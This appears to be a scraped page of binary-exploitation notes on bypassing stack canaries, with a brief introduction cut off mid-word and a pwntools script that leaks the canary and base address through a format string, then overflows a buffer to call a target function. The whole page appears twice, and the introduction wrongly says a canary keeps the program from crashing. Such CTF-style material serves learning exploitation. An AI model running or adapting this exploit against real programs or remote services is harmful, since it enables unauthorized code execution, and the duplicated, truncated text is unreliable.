Exploitation

A canary helps to prevent buffer overflow attacks by detecting stack overflow and preventing the program from crashing. Canary Bypass is used to bypass the protection provided by the stack canary. Thi

from pwn import *
import re

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath) # p = remote('example.com', '1337') for remote connection

# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base

payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()

PreviousBinary Exploitation with Buffer Overflow NextBinary Exploitation with Format String

Last updated 1 year ago

Exploitation

from pwn import *
import re

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath) # p = remote('example.com', '1337') for remote connection

# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base

payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()

PreviousBinary Exploitation with Buffer Overflow NextBinary Exploitation with Format String

Last updated 1 year ago